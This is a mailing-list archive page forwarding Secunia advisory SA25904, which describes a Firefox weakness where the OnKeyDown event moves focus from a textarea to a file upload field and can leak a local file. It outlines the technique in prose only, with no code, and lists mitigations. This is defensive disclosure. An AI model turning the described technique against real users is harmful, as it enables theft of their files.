Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

   


   


   

















      :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: [SA25904] Firefox "OnKeyDown" Event Focus Weakness



> 
> TITLE:
> Firefox "OnKeyDown" Event Focus Weakness
> 
> SECUNIA ADVISORY ID:
> SA25904
> 
> VERIFY ADVISORY:
> http://secunia.com/advisories/25904/
> 
> CRITICAL:
> Not critical
> 
> IMPACT:
> Exposure of sensitive information
> 
> WHERE:
> From remote
> 
> SOFTWARE:
> Mozilla Firefox 1.x
> http://secunia.com/product/4227/
> Mozilla Firefox 2.0.x
> http://secunia.com/product/12434/
> 
> DESCRIPTION:
> Carl Hardwick has discovered a weakness in Firefox, which potentially
> can be exploited by malicious people to disclose sensitive
> information.
> 
> The weakness is caused due to a design error within the focus
> handling of form fields and can potentially be exploited by changing
> the focus from a "textarea" field to a "file upload" form field via
> the "OnKeyDown" event.
> 
> Successful exploitation allows an arbitrary file on the user's system
> to be uploaded to a malicious web site, but requires that the user is
> tricked into typing the file name into a "textarea" input form.
> 
> The weakness is confirmed in version 2.0.0.4. Other versions may also
> be affected.
> 
> SOLUTION:
> Disable JavaScript support.
> 
> Do not enter file names to form fields on untrusted web sites.
> 
> PROVIDED AND/OR DISCOVERED BY:
> Carl Hardwick
> 
> ORIGINAL ADVISORY:
> http://archives.neohapsis.com/archives/fulldisclosure/2007-06/
> 0646.html
> 



 




Copyright © Lexa Software, 1996-2009.